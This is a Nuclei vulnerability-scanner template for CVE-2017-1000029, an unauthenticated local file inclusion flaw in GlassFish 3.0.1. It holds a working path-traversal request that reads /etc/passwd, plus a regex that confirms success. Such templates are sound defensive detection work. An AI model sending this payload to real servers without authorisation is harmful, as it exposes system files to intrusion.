nuclei-templates/cves/2017/CVE-2017-1000029.yaml

33 lines
1.1 KiB
YAML

id: CVE-2017-1000029
info:
name: GlassFish Server Open Source Edition 3.0.1 - LFI
author: 0x_Akoko
severity: high
description: Oracle, GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to Local File Inclusion vulnerability, that makes it possible to include arbitrary files on the server, this vulnerability can be exploited without any prior authentication.
reference:
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784
- https://www.cvedetails.com/cve/CVE-2017-1000029
- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-1000029
cwe-id: CWE-200
tags: cve,cve2017,glassfish,oracle,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/resource/file%3a///etc/passwd/"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
- type: status
status:
- 200